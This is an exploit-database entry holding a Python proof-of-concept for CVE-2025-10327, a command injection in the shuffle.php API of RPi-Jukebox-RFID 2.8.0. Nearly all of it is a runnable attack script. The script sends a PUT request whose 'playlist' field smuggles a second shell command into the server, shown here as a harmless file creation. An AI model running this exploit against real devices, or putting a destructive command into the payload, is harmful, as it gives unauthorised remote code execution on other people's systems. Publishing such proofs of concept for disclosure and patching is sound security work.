Share
## https://sploitus.com/exploit?id=PACKETSTORM:214064
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution 
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
    # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
    # Version: 2.8.0
    # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
    # CVE: CVE-2025-10327
    #
    # Description:
    # This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
    # The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
    # allowing an attacker to execute arbitrary system commands.
    
    import requests
    import json
    
    # Replace this with the actual target IP or hostname
    TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"
    
    # Payload to inject โ€“ here we create a file as proof of execution
    INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"
    
    # JSON payload for the request
    payload = {
        "playlist": INJECTED_COMMAND,
        "shuffle": "true"
    }
    
    # HTTP headers
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    def exploit():
        print("[+] Sending malicious JSON payload to trigger command injection...")
        try:
            response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
            print(f"[+] HTTP Status Code: {response.status_code}")
            print("[*] If the target is vulnerable, the command should be executed on the server.")
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
    
    if __name__ == "__main__":
        exploit()